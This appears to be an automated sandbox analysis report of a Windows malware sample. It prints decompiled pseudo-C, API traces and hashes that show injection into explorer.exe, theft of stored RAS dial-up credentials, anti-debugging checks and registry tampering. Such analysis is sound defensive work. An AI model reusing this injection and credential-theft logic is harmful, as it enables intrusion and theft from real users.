                                    				 *[fs:eax] = _t55 + 0xfffffff0;
                                    				E004013A4(0,  &_v16);
                                    				_t52 = E00401F48(_v16);
                                    				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    				_t37 = OpenProcess(0x1f0fff, 0, _v8);
                                    				E00401CAC( &_v20, _t17);
                                    				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
                                    				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E0040B069);
                                    				return E00401AE4( &_v20, 2);
                                    			}

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				void* _t23;
                                    				intOrPtr _t50;
                                    				intOrPtr _t58;
                                    				void* _t59;
                                    
                                    				_t59 = __eflags;
                                    				_t55 = __esi;
                                    				_t54 = __edi;
                                    				_t41 = __ebx;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t58);
                                    				_push(0x407ef8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t58;
                                    				_push("RasDialParams!");
                                    				E00407CAC( &_v16, __ebx, __ecx);
                                    				_push(_v16);
                                    				_push(0x407f24);
                                    				E00401E10();
                                    				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
                                    				_t60 = _t23;
                                    				if(_t23 != 0) {
                                    					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
                                    					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				_pop(_t50);
                                    				 *[fs:eax] = _t50;
                                    				_push(E00407EFF);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				_Unknown_base(*)()* _t6;
                                    				void* _t8;
                                    				void* _t14;
                                    				void* _t15;
                                    
                                    				_t14 = __ecx;
                                    				_t15 = __edx;
                                    				_t8 = __eax;
                                    				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
                                    				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E0040562C() {
                                    				void* _t5;
                                    				struct HINSTANCE__* _t6;
                                    				intOrPtr* _t7;
                                    				intOrPtr* _t8;
                                    
                                    				_t5 = 0;
                                    				_t6 = LoadLibraryA("kernel32.dll");
                                    				if(_t6 != 0) {
                                    					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
                                    					_t7 = _t8;
                                    					if(_t8 != 0) {
                                    						_t5 =  *_t7();
                                    					}
                                    				}
                                    				return _t5;
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
                                    				void* _v8;
                                    				char* _t7;
                                    				void** _t11;
                                    
                                    				_t7 = __edx;
                                    				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
                                    				RegDeleteKeyA(_v8, _t7);
                                    				return RegCloseKey(_v8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405EAC(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
                                    				return  *_t3(_t5, _t7);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,0040601D,?,00409E30,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00405EBC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405EC2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517715178.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000004.00000002.517707147.0000000024010000.00000002.00000001.sdmp
                                    • Associated: 00000004.00000002.517736735.0000000024071000.00000004.00000001.sdmp
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
                                    				long _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) {
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(1);
                                    				return _t7;
                                    			}

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
                                    				void* _t7;
                                    
                                    				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t7);
                                    					return 1;
                                    				} else {
                                    					CloseHandle(_t7);
                                    					return 0;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				struct _PROCESS_INFORMATION _v28;
                                    				struct _STARTUPINFOA _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				intOrPtr _t58;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t61;
                                    				char* _t62;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t91;
                                    				intOrPtr* _t99;
                                    				void* _t104;
                                    				intOrPtr* _t113;
                                    				intOrPtr* _t119;
                                    				intOrPtr* _t124;
                                    				intOrPtr _t129;
                                    				intOrPtr* _t137;
                                    				void* _t142;
                                    				intOrPtr* _t151;
                                    				intOrPtr _t159;
                                    				char* _t161;
                                    				struct HWND__* _t163;
                                    				void* _t168;
                                    				intOrPtr _t197;
                                    				intOrPtr _t201;
                                    				intOrPtr _t210;
                                    				intOrPtr _t221;
                                    				void* _t236;
                                    				void* _t239;
                                    				void* _t241;
                                    
                                    				_t234 = __edi;
                                    				_t194 = __ecx;
                                    				_t185 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v116 = 0;
                                    				_v112 = 0;
                                    				_v108 = 0;
                                    				_v104 = 0;
                                    				_v100 = 0;
                                    				_push(_t239);
                                    				_push(0x40b7a8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t239 + 0xffffff90;
                                    				_t58 =  *0x40d1cc; // 0x40e924
                                    				_t236 = E00401F9C(_t58);
                                    				_t60 =  *0x40d210; // 0x40e8ec
                                    				_t241 =  *_t60 - 2;
                                    				if(_t241 != 0) {
                                    					_t61 =  *0x40d210; // 0x40e8ec
                                    					__eflags =  *_t61 - 1;
                                    					if(__eflags != 0) {
                                    						_t62 =  *0x40d1b8; // 0x40e8fc
                                    						__eflags =  *_t62 - 1;
                                    						if( *_t62 == 1) {
                                    							__eflags = 0;
                                    							E004013A4(0,  &_v116);
                                    							E00401E94( *0x40f1e8, _v116);
                                    							if(__eflags != 0) {
                                    								_t194 = E00401F48( *0x40f1e8);
                                    								__eflags = 0;
                                    								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
                                    								E0040AFB0(__ebx, _t85, _t236, 0);
                                    								ExitProcess(0);
                                    							}
                                    						}
                                    						_t197 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = 0;
                                    						E004013A4(0, _t197);
                                    						E00403738();
                                    						E00403738();
                                    						_t71 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
                                    						_t91 =  *0x40d21c; // 0x40e8f0
                                    						E00401B14(_t91, _v112);
                                    						E00403738();
                                    						E00403738();
                                    						_t99 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						__eflags = _t104;
                                    						if(_t104 == 0) {
                                    							_t210 =  *0x40d21c; // 0x40e8f0
                                    							E004013A4(0, _t210);
                                    							E00403738();
                                    							E00403738();
                                    							_t113 =  *0x40d21c; // 0x40e8f0
                                    							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    				} else {
                                    					_t119 =  *0x40d21c; // 0x40e8f0
                                    					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
                                    					E00401E94(_v100, "explorer.exe");
                                    					if(_t241 != 0) {
                                    						_t124 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
                                    						if(__eflags != 0) {
                                    							E00406294( &_v108, _t185, __edi, _t236, __eflags);
                                    							_t129 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t129, _v108);
                                    						} else {
                                    							E004063FC(_v12,  &_v104);
                                    							_t159 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t159, _v104);
                                    						}
                                    						E00403738();
                                    						E00403738();
                                    						_t137 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						_t161 =  *0x40d214; // 0x40e8f4
                                    						if( *_t161 != 1) {
                                    							_t163 = FindWindowA("shell_traywnd", 0); // executed
                                    							GetWindowThreadProcessId(_t163,  &_v8);
                                    							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
                                    							__eflags = _t168;
                                    							if(_t168 != 0) {
                                    								_t142 = 1;
                                    							} else {
                                    								E00403738();
                                    								E00403738();
                                    								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
                                    								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
                                    							}
                                    						} else {
                                    							E00403738();
                                    							E00403738();
                                    							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    					if(_t142 == 0) {
                                    						_t221 =  *0x40d21c; // 0x40e8f0
                                    						E004013A4(0, _t221);
                                    						E00403738();
                                    						E00403738();
                                    						_t151 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					}
                                    				}
                                    				_pop(_t201);
                                    				 *[fs:eax] = _t201;
                                    				_push(E0040B7AF);
                                    				return E00401AE4( &_v116, 5);
                                    			}

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
